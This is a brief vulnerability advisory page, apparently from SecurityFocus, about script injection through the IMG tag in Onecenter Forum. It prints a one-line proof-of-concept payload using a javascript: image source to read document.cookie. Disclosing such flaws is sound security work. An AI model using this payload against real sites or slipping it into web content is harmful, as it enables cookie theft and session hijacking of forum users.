info
discussion
exploit
solution
references
Onecenter Forum IMG Tag Script Injection Vulnerability
The following proof of concept was provided:
<img src=javascript:alert(document.cookie);>
Privacy Statement
Copyright 2010, SecurityFocus